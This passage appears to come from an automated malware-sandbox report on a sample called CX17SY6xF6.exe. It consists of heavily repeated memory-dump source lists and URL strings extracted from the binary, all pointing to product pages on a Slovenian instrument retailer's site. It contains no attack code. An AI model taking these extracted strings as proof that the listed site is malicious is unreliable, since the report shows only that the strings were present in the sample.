00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/bypass-prikazovalniki
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/dodatki-za-merilce-ni
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/opticna-stikala-nivoj
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/plavajoca-stikala/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/potopni-hidrostaticni
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/prikazovalniki-nivoja
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-nivoja/wika-merilniki-nivoja/zvezno-merjenje-nivoj
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-ph-co2-prevodnosti-vakuuma-vsebnosti-soli-kvalitet
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/digitalni-manometri/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/elektricni-pribor-za-merilnike-tlaka/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/kontaktni-manometri-2/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/manometri-z-izhodnim-signalom/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/manometri/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found 